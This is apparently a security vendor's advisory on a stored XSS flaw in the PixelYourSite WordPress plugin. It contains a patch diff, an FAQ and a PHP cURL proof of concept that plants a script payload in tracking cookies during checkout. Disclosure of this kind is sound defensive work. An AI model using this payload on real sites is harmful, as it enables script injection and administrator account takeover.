What is CVE-2026-1841?

CVE-2026-1841 is a high-severity unauthenticated stored cross-site scripting (XSS) vulnerability in the PixelYourSite WordPress plugin. It allows attackers to inject malicious JavaScript into pages viewed by users, potentially leading to session hijacking and data exfiltration.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization of the ‘pysTrafficSource’ and ‘pys_landing_page’ parameters. Attackers can set these parameters via cookies, allowing them to store malicious scripts that execute when users access affected pages.

Who is affected by this vulnerability?

All installations of the PixelYourSite plugin version 11.2.0 and earlier are affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the PixelYourSite plugin and verify if the version is 11.2.0 or earlier.

What should I do to fix this vulnerability?

The vulnerability is patched in version 11.2.0.1 of the PixelYourSite plugin. Update to this version or later to ensure that the vulnerability is mitigated.

Are there any additional mitigation strategies?

In addition to updating the plugin, consider implementing a web application firewall (WAF) and regularly reviewing user input sanitization practices across your site to further reduce the risk of XSS vulnerabilities.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation can lead to significant impacts, such as unauthorized access to sensitive data or user accounts.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can use cURL to set malicious cookies and simulate a checkout process. This demonstrates how the vulnerability can be exploited to inject scripts that execute in users’ browsers.

What is stored cross-site scripting (XSS)?

Stored XSS occurs when an attacker injects malicious scripts into a web application, which are then stored on the server and served to users. This type of attack can persist across sessions and affect many users who access the compromised content.

How can I further secure my WordPress site against XSS?

To enhance security, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, and implement strict content security policies. Additionally, educate users about safe browsing practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1841: PixelYourSite <= 11.2.0 – Unauthenticated Stored Cross-Site Scripting (pixelyoursite)

Q: What are the potential impacts of this vulnerability?

Successful exploitation can lead to session hijacking, administrative account takeover, site defacement, or data exfiltration. Since the payloads are stored in order metadata, they can affect multiple users.

CVE ID CVE-2026-1841

Plugin pixelyoursite

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 11.2.0

Patched Version 11.2.0.1

Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1841:
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the PixelYourSite WordPress plugin. The vulnerability affects all plugin versions up to and including 11.2.0. It allows attackers to inject arbitrary JavaScript payloads that execute when users view compromised pages. The CVSS score of 7.2 indicates a high-severity issue.

Root Cause:
The vulnerability stems from insufficient input sanitization and output escaping for user-supplied parameters in the plugin’s order enrichment functionality. The primary vulnerable code resides in the `getPysData()` method within `/pixelyoursite/includes/enrich/class_enrich_order.php`. In the vulnerable version, lines 125-146 and 198-256 directly assign values from `$_COOKIE[‘pys_landing_page’]` and `$_COOKIE[‘pysTrafficSource’]` to the `$pysData` array without proper sanitization. These cookie values are later stored in payment metadata and potentially rendered without escaping.

Exploitation:
Attackers can exploit this vulnerability by setting malicious JavaScript payloads in the `pys_landing_page` or `pysTrafficSource` cookies and then triggering an order or subscription process. The plugin’s `edd_save_checkout_fields()` function (lines 125-146) processes these cookies during Easy Digital Downloads checkout. The unsanitized values persist in the `pys_enrich_data` payment meta. When this data is later output in administrative interfaces or frontend pages without proper escaping, the payload executes in victims’ browsers.

Patch Analysis:
The patch refactors the vulnerable code by introducing a new `getPysData()` method that centralizes data collection. Key changes include replacing direct cookie access with sanitized retrieval through the `getRequestValue()` helper method (lines 229-242). This method applies `sanitize_text_field()` to all user input. The patch also adds dedicated sanitization methods: `getDefaultLanding()` (lines 245-255), `getDefaultSource()` (lines 257-267), `getDefaultLastLanding()` (lines 269-279), and `getDefaultLastSource()` (lines 281-291). These methods ensure cookie values are sanitized before use.

Impact:
Successful exploitation allows unauthenticated attackers to inject malicious JavaScript that executes in the context of authenticated users. This can lead to session hijacking, administrative account takeover, site defacement, or data exfiltration. Since the payloads are stored in order metadata, they persist across sessions and affect multiple users who view the compromised data.

Differential between vulnerable and patched code

Code Diff

--- a/pixelyoursite/facebook-pixel-master.php
+++ b/pixelyoursite/facebook-pixel-master.php
@@ -4,7 +4,7 @@
  * Plugin Name: PixelYourSite
  * Plugin URI: http://www.pixelyoursite.com/
  * Description: Meta Pixel & CAPI, GA4, and GTM support with ZERO CODING. Track events, WooCommerce/EDD ready, with Pinterest & Bing add-ons, plus consent support.
- * Version: 11.2.0
+ * Version: 11.2.0.1
  * Author: PixelYourSite
  * Author URI: http://www.pixelyoursite.com
  * License: GPLv3
--- a/pixelyoursite/includes/class-custom-event.php
+++ b/pixelyoursite/includes/class-custom-event.php
@@ -890,7 +890,7 @@
                     ? sanitize_text_field( $args['ga_ads_event_action'] )
                     : 'view_item';

-                $this->data['ga_ads_custom_event_action'] = $this->ga_ads_event_action == '_custom' || $this->ga_ads_event_action == 'CustomEvent' && !empty( $args['ga_ads_custom_event_action'] )
+                $this->data['ga_ads_custom_event_action'] = ($this->ga_ads_event_action == '_custom' || $this->ga_ads_event_action == 'CustomEvent') && !empty( $args['ga_ads_custom_event_action'] )
                     ? sanitizeKey( $args['ga_ads_custom_event_action'] )
                     : null;

@@ -901,7 +901,8 @@
                     foreach ($group as $name => $fields) {
                         if($name == $this->data['ga_ads_event_action']) {
                             foreach ($fields as $field) {
-                                $this->data['ga_ads_params'][$field] = isset($args['ga_ads_params'][$field]) ? $args['ga_ads_params'][$field] : "";
+                                $fieldName = is_array($field) && isset($field['name']) ? $field['name'] : $field;
+                                $this->data['ga_ads_params'][$field] = isset($args['ga_ads_params'][$fieldName]) ? $args['ga_ads_params'][$fieldName] : "";
                             }
                             break;
                         }
@@ -976,7 +977,8 @@
             foreach ($group as $name => $fields) {
                 if($name == $this->data['ga_event_action']) {
                     foreach ($fields as $field) {
-                        $list[$field] = "";
+                        $fieldName = is_array($field) && isset($field['name']) ? $field['name'] : $field;
+                        $list[$fieldName] = "";
                     }
                 }
             }
@@ -1115,7 +1117,8 @@
             foreach ($group as $name => $fields) {
                 if($name == $this->data['gtm_event_action']) {
                     foreach ($fields as $field) {
-                        $this->data['gtm_params'][$field] = isset($args['gtm_params'][$field]) ? $args['gtm_params'][$field] : "";
+                        $fieldName = is_array($field) && isset($field['name']) ? $field['name'] : $field;
+                        $this->data['gtm_params'][$fieldName] = isset($args['gtm_params'][$fieldName]) ? $args['gtm_params'][$fieldName] : "";
                     }
                     break;
                 }
--- a/pixelyoursite/includes/enrich/class_enrich_order.php
+++ b/pixelyoursite/includes/enrich/class_enrich_order.php
@@ -125,70 +125,18 @@

     function edd_save_checkout_fields( $payment_meta ,$init_payment_data) {

-		$edd_subscription = $init_payment_data[ 'status' ] == 'edd_subscription';
+        $edd_subscription = $init_payment_data['status'] == 'edd_subscription';

-		if ( 0 !== did_action( 'edd_pre_process_purchase' ) || $edd_subscription ) {
-			$pysData = [];
-			$utms = getUtms( true );
-			$utms_id = getUtmsId( true );
-
-			$pys_browser_time = getBrowserTime();
-
-            $pys_landing = $pys_source = defined( 'REST_REQUEST' ) && REST_REQUEST ? 'REST API' : '';
-			if ( isset( $_REQUEST[ 'pys_landing' ] ) ) {
-				$pys_landing = sanitize_text_field( $_REQUEST[ 'pys_landing' ] );
-			} elseif ( isset( $_COOKIE[ 'pys_landing_page' ] ) || isset( $_SESSION[ 'LandingPage' ] ) ) {
-				$pys_landing = $_COOKIE[ 'pys_landing_page' ] ?? $_SESSION[ 'LandingPage' ];
-			}
-
-			if ( $edd_subscription ) {
-				$pys_source = 'recurring payment';
-			} elseif ( isset( $_REQUEST[ 'pys_source' ] ) ) {
-				$pys_source = sanitize_text_field( $_REQUEST[ 'pys_source' ] );
-			} elseif ( isset( $_COOKIE[ 'pysTrafficSource' ] ) || isset( $_SESSION[ 'TrafficSource' ] ) ) {
-				$pys_source = $_COOKIE[ 'pysTrafficSource' ] ?? $_SESSION[ 'TrafficSource' ];
-			}
-
-			if ( $edd_subscription ) {
-				$pys_utm = implode( "|", array_map( function ( $key ) {
-					return "$key:recurring payment";
-				}, array_keys( $utms ), $utms ) );
-			} elseif ( isset( $_REQUEST[ 'pys_utm' ] ) ) {
-				$pys_utm = sanitize_text_field( $_REQUEST[ 'pys_utm' ] );
-			} else {
-				$pys_utm = implode( "|", array_map( function ( $key, $value ) {
-					return "$key:$value";
-				}, array_keys( $utms ), $utms ) );
-			}
-
-			if ( $edd_subscription ) {
-				$pys_utm_id = implode( "|", array_map( function ( $key, $value ) {
-					return "$key:recurring payment";
-				}, array_keys( $utms_id ), $utms_id ) );
-			} elseif ( isset( $_REQUEST[ 'pys_utm_id' ] ) ) {
-				$pys_utm_id = sanitize_text_field( $_REQUEST[ 'pys_utm_id' ] );
-			} else {
-				$pys_utm_id = implode( "|", array_map( function ( $key, $value ) {
-					return "$key:$value";
-				}, array_keys( $utms_id ), $utms_id ) );
-			}
-
-			$pysData[ 'pys_landing' ] = $pys_landing;
-			$pysData[ 'pys_source' ] = $pys_source;
-			$pysData[ 'pys_utm' ] = $pys_utm;
-			$pysData[ 'pys_browser_time' ] = isset( $_REQUEST[ 'pys_browser_time' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_browser_time' ] ) : $pys_browser_time;
-
-			$pysData[ 'last_pys_landing' ] = $pys_landing;
-			$pysData[ 'last_pys_source' ] = $pys_source;
-			$pysData[ 'last_pys_utm' ] = $pys_utm;
-			$pysData[ 'pys_utm_id' ] = $pys_utm_id;
-			$pysData[ 'last_pys_utm_id' ] = $pys_utm_id;
-
-			$payment_meta[ 'pys_enrich_data' ] = $pysData;
+        if ( 0 !== did_action( 'edd_pre_process_purchase' ) || $edd_subscription ) {
+            $pysData = $this->getPysData( $edd_subscription );
+            $payment_meta['pys_enrich_data'] = $pysData;
         }
+
         return $payment_meta;
     }

+
+
 	/**
 	 * Save subscription meta for recurring payments
 	 * @param $payment_id
@@ -198,84 +146,191 @@

 		$payment_meta = edd_get_payment_meta( $payment_id );

-		$utms = getUtms( true );
-		$utms_id = getUtmsId( true );
-
-		$pysData = array();
-		$utms_recurring = implode( "|", array_map( function ( $key ) {
-			return "$key:recurring payment";
-		}, array_keys( $utms ), $utms ) );
-		$utms_id_recurring = implode( "|", array_map( function ( $key ) {
-			return "$key:recurring payment";
-		}, array_keys( $utms_id ), $utms_id ) );
-		$pysData[ 'pys_landing' ] = '';
-		$pysData[ 'pys_source' ] = 'recurring payment';
-		$pysData[ 'pys_utm' ] = $utms_recurring;
-		$pysData[ 'last_pys_landing' ] = '';
-		$pysData[ 'last_pys_source' ] = 'recurring payment';
-		$pysData[ 'last_pys_utm' ] = $utms_recurring;
-		$pysData[ 'pys_utm_id' ] = $utms_id_recurring;
-		$pysData[ 'last_pys_utm_id' ] = $utms_id_recurring;
-
-		$pys_browser_time = getBrowserTime();
-		$pysData[ 'pys_browser_time' ] = isset( $_REQUEST[ 'pys_browser_time' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_browser_time' ] ) : $pys_browser_time;
+		$pysData = $this->getPysData( true );

 		$payment_meta[ 'pys_enrich_data' ] = $pysData;
 		edd_update_payment_meta( $payment_id, '_edd_payment_meta', $payment_meta );
 	}

-    function getPysData( $renewal_order = false ){
-		$pysData = array();
-		$utms = getUtms( true );
-		$utms_id = getUtmsId( true );
-
-		if ( $renewal_order ) {
-			$utms_recurring = implode( "|", array_map( function ( $key ) {
-				return "$key:recurring payment";
-			}, array_keys( $utms ), $utms ) );
-
-			$utms_id_recurring = implode( "|", array_map( function ( $key, $value ) {
-				return "$key:recurring payment";
-			}, array_keys( $utms_id ), $utms_id ) );
-
-			$pysData[ 'pys_landing' ] = '';
-			$pysData[ 'pys_source' ] = 'recurring payment';
-			$pysData[ 'pys_utm' ] = $utms_recurring;
-			$pysData[ 'pys_utm_id' ] = $utms_id_recurring;
-			$pysData[ 'last_pys_landing' ] = '';
-			$pysData[ 'last_pys_source' ] = 'recurring payment';
-			$pysData[ 'last_pys_utm' ] = $utms_recurring;
-			$pysData[ 'last_pys_utm_id' ] = $utms_id_recurring;
-		} else {
-			$pys_landing = $pys_source = '';
-			if ( isset( $_COOKIE[ 'pys_landing_page' ] ) || isset( $_SESSION[ 'LandingPage' ] ) ) {
-				$pys_landing = $_COOKIE[ 'pys_landing_page' ] ?? $_SESSION[ 'LandingPage' ];
-			}
-			if ( isset( $_COOKIE[ 'pysTrafficSource' ] ) || isset( $_SESSION[ 'TrafficSource' ] ) ) {
-				$pys_source = $_COOKIE[ 'pysTrafficSource' ] ?? $_SESSION[ 'TrafficSource' ];
-			}
-
-			$pys_utm = implode( "|", array_map( function ( $key, $value ) {
-				return "$key:$value";
-			}, array_keys( $utms ), $utms ) );
-			$pys_utm_id = implode( "|", array_map( function ( $key, $value ) {
-				return "$key:$value";
-			}, array_keys( $utms_id ), $utms_id ) );
-
-			$pysData[ 'pys_landing' ] = isset( $_REQUEST[ 'pys_landing' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_landing' ] ) : $pys_landing;
-			$pysData[ 'pys_source' ] = isset( $_REQUEST[ 'pys_source' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_source' ] ) : $pys_source;
-			$pysData[ 'pys_utm' ] = isset( $_REQUEST[ 'pys_utm' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_utm' ] ) : $pys_utm;
-			$pysData[ 'pys_utm_id' ] = isset( $_REQUEST[ 'pys_utm_id' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_utm_id' ] ) : $pys_utm_id;
-			$pysData[ 'last_pys_landing' ] = isset( $_REQUEST[ 'last_pys_landing' ] ) ? sanitize_text_field( $_REQUEST[ 'last_pys_landing' ] ) : $pys_landing;
-			$pysData[ 'last_pys_source' ] = isset( $_REQUEST[ 'last_pys_source' ] ) ? sanitize_text_field( $_REQUEST[ 'last_pys_source' ] ) : $pys_source;
-			$pysData[ 'last_pys_utm' ] = isset( $_REQUEST[ 'last_pys_utm' ] ) ? sanitize_text_field( $_REQUEST[ 'last_pys_utm' ] ) : $pys_utm;
-			$pysData[ 'last_pys_utm_id' ] = isset( $_REQUEST[ 'last_pys_utm_id' ] ) ? sanitize_text_field( $_REQUEST[ 'last_pys_utm_id' ] ) : $pys_utm_id;
-		}
+    function getPysData( $renewal_order = false ) {
+        $utms = getUtms( true );
+        $utms_id = getUtmsId( true );
+
+        if ( $renewal_order ) {
+            $pysData = $this->buildRenewalPysData( $utms, $utms_id );
+        } else {
+            $pysData = $this->buildRegularPysData( $utms, $utms_id );
+        }
+
+        $pysData['pys_browser_time'] = $this->getRequestValue( 'pys_browser_time', getBrowserTime() );
+        return $pysData;
+    }
+
+    /**
+     * Build PYS data for renewal/subscription orders
+     *
+     * @param array $utms UTM parameters
+     * @param array $utms_id UTM ID parameters
+     * @return array
+     */
+    private function buildRenewalPysData( $utms, $utms_id ) {
+        $utms_recurring = $this->formatUtmsAsRecurring( $utms );
+        $utms_id_recurring = $this->formatUtmsAsRecurring( $utms_id );
+
+        return [
+            'pys_landing'      => '',
+            'pys_source'       => 'recurring payment',
+            'pys_utm'          => $utms_recurring,
+            'pys_utm_id'       => $utms_id_recurring,
+            'last_pys_landing' => '',
+            'last_pys_source'  => 'recurring payment',
+            'last_pys_utm'     => $utms_recurring,
+            'last_pys_utm_id'  => $utms_id_recurring,
+        ];
+    }

-		$pys_browser_time = getBrowserTime();
-		$pysData[ 'pys_browser_time' ] = isset( $_REQUEST[ 'pys_browser_time' ] ) ? sanitize_text_field( $_REQUEST[ 'pys_browser_time' ] ) : $pys_browser_time;
+    /**
+     * Build PYS data for regular orders
+     *
+     * @param array $utms UTM parameters (first visit)
+     * @param array $utms_id UTM ID parameters (first visit)
+     * @return array
+     */
+    private function buildRegularPysData( $utms, $utms_id ) {
+        // First visit defaults
+        $default_landing = $this->getDefaultLanding();
+        $default_source = $this->getDefaultSource();
+        $default_utm = $this->formatUtms( $utms );
+        $default_utm_id = $this->formatUtms( $utms_id );
+
+        // Last visit defaults
+        $default_last_landing = $this->getDefaultLastLanding();
+        $default_last_source = $this->getDefaultLastSource();
+        $default_last_utm = $this->formatUtms( getUtms( true, true ) );
+        $default_last_utm_id = $this->formatUtms( getUtmsId( true, true ) );
+
+        return [
+            'pys_landing'      => $this->getRequestValue( 'pys_landing', $default_landing, 'undefined' ),
+            'pys_source'       => $this->getRequestValue( 'pys_source', $default_source, 'undefined' ),
+            'pys_utm'          => $this->getRequestValue( 'pys_utm', $default_utm ),
+            'pys_utm_id'       => $this->getRequestValue( 'pys_utm_id', $default_utm_id ),
+            'last_pys_landing' => $this->getRequestValue( 'last_pys_landing', $default_last_landing, 'undefined' ),
+            'last_pys_source'  => $this->getRequestValue( 'last_pys_source', $default_last_source, 'undefined' ),
+            'last_pys_utm'     => $this->getRequestValue( 'last_pys_utm', $default_last_utm ),
+            'last_pys_utm_id'  => $this->getRequestValue( 'last_pys_utm_id', $default_last_utm_id ),
+        ];
+    }
+
+    /**
+     * Get sanitized value from REQUEST or use fallback
+     *
+     * @param string $key Request key
+     * @param mixed $fallback Fallback value
+     * @param mixed $empty_fallback Value to use if fallback is empty
+     * @return string
+     */
+    private function getRequestValue( $key, $fallback = '', $empty_fallback = null ) {
+        if ( isset( $_REQUEST[ $key ] ) ) {
+            return sanitize_text_field( $_REQUEST[ $key ] );
+        }
+
+        if ( $empty_fallback !== null && empty( $fallback ) ) {
+            return $empty_fallback;
+        }
+
+        return $fallback ?? '';
+    }
+
+    /**
+     * Get default landing page from session/cookie (first visit)
+     *
+     * @return string
+     */
+    private function getDefaultLanding() {
+        $landingPage = $_SESSION['LandingPage'] ?? $_COOKIE['pys_landing_page'];
+
+        if ( !empty($landingPage) && defined( 'REST_REQUEST' ) && REST_REQUEST ) {
+            $landingPage = 'REST API';
+        }
+
+        return sanitize_text_field($landingPage ?? '');
+    }
+
+    /**
+     * Get default traffic source from session/cookie (first visit)
+     *
+     * @return string
+     */
+    private function getDefaultSource() {
+        $trafficSource = $_SESSION['TrafficSource'] ?? $_COOKIE['pysTrafficSource'];
+        if ( !empty($trafficSource) && defined( 'REST_REQUEST' ) && REST_REQUEST ) {
+            $trafficSource = 'REST API';
+        }
+
+        return  sanitize_text_field($trafficSource ?? '');
+    }
+
+    /**
+     * Get default last landing page from cookie (last visit)
+     *
+     * @return string
+     */
+    private function getDefaultLastLanding() {
+        $lastLanding = $_COOKIE['last_pys_landing_page'] ?? $_SESSION['LandingPage'] ?? $_COOKIE['pys_landing_page'];
+        if ( !empty($lastLanding) && defined( 'REST_REQUEST' ) && REST_REQUEST ) {
+            $lastLanding = 'REST API';
+        }
+
+        return  sanitize_text_field($lastLanding ?? '');
+    }
+
+    /**
+     * Get default last traffic source from cookie (last visit)
+     *
+     * @return string
+     */
+    private function getDefaultLastSource() {
+        $lastSource = $_COOKIE['last_pysTrafficSource'] ?? $_SESSION['TrafficSource'] ?? $_COOKIE['pysTrafficSource'];
+        if ( !empty($lastSource) && defined( 'REST_REQUEST' ) && REST_REQUEST ) {
+            return 'REST API';
+        }
+
+        return sanitize_text_field($lastSource ?? '');
+    }
+
+    /**
+     * Format UTMs array as pipe-separated string (key:value|key:value)
+     *
+     * @param array $utms UTM parameters
+     * @return string
+     */
+    private function formatUtms( $utms ) {
+        if ( empty( $utms ) ) {
+            return '';
+        }
+
+        return implode( '|', array_map(
+            function ( $key, $value ) { return "$key:$value"; },
+            array_keys( $utms ),
+            $utms
+        ) );
+    }
+
+    /**
+     * Format UTMs array as recurring payment string (key:recurring payment|...)
+     *
+     * @param array $utms UTM parameters
+     * @return string
+     */
+    private function formatUtmsAsRecurring( $utms ) {
+        if ( empty( $utms ) ) {
+            return '';
+        }

-		return $pysData;
+        return implode( '|', array_map(
+            function ( $key ) { return "$key:recurring payment"; },
+            array_keys( $utms )
+        ) );
     }
 }

--- a/pixelyoursite/pixelyoursite.php
+++ b/pixelyoursite/pixelyoursite.php
@@ -4,7 +4,7 @@
     exit; // Exit if accessed directly.
 }

-define( 'PYS_FREE_VERSION', '11.2.0' );
+define( 'PYS_FREE_VERSION', '11.2.0.1' );
 define( 'PYS_FREE_PINTEREST_MIN_VERSION', '6.2.0' );
 define( 'PYS_FREE_BING_MIN_VERSION', '4.2.0' );
 define( 'PYS_FREE_REDDIT_MIN_VERSION', '1.1.0' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1841 - PixelYourSite <= 11.2.0 - Unauthenticated Stored Cross-Site Scripting
<?php

$target_url = 'https://vulnerable-site.com';

// Malicious JavaScript payload to execute
$payload = '<script>alert(document.domain)</script>';

// Initialize cURL session
$ch = curl_init();

// Set the target checkout endpoint (adjust based on actual vulnerable endpoint)
// This targets the Easy Digital Downloads checkout process
$checkout_url = $target_url . '/checkout';

// Configure cURL options
curl_setopt($ch, CURLOPT_URL, $checkout_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, "pys_landing_page=" . urlencode($payload) . "; pysTrafficSource=" . urlencode($payload));

// Add POST data to simulate a legitimate checkout request
$post_data = [
    'edd_action' => 'purchase',
    'edd-gateway' => 'manual',
    'edd_email' => 'attacker@example.com',
    'edd_first' => 'Test',
    'edd_last' => 'User'
];

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "[+] Payload injected successfully.n";
    echo "[+] The XSS payload will execute when an administrator views the order details.n";
} else {
    echo "[-] Injection failed. HTTP Code: " . $http_code . "n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1841?
Understanding the vulnerability
CVE-2026-1841 is a high-severity unauthenticated stored cross-site scripting (XSS) vulnerability in the PixelYourSite WordPress plugin. It allows attackers to inject malicious JavaScript into pages viewed by users, potentially leading to session hijacking and data exfiltration.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization of the ‘pysTrafficSource’ and ‘pys_landing_page’ parameters. Attackers can set these parameters via cookies, allowing them to store malicious scripts that execute when users access affected pages.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the PixelYourSite plugin version 11.2.0 and earlier are affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the PixelYourSite plugin and verify if the version is 11.2.0 or earlier.
What should I do to fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 11.2.0.1 of the PixelYourSite plugin. Update to this version or later to ensure that the vulnerability is mitigated.
Are there any additional mitigation strategies?
Enhancing security practices
In addition to updating the plugin, consider implementing a web application firewall (WAF) and regularly reviewing user input sanitization practices across your site to further reduce the risk of XSS vulnerabilities.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation can lead to significant impacts, such as unauthorized access to sensitive data or user accounts.
How does the proof of concept demonstrate the issue?
Illustrating the exploitation process
The proof of concept provided shows how an attacker can use cURL to set malicious cookies and simulate a checkout process. This demonstrates how the vulnerability can be exploited to inject scripts that execute in users’ browsers.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can lead to session hijacking, administrative account takeover, site defacement, or data exfiltration. Since the payloads are stored in order metadata, they can affect multiple users.
What is stored cross-site scripting (XSS)?
Defining the attack type
Stored XSS occurs when an attacker injects malicious scripts into a web application, which are then stored on the server and served to users. This type of attack can persist across sessions and affect many users who access the compromised content.
How can I further secure my WordPress site against XSS?
Best practices for web security
To enhance security, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, and implement strict content security policies. Additionally, educate users about safe browsing practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations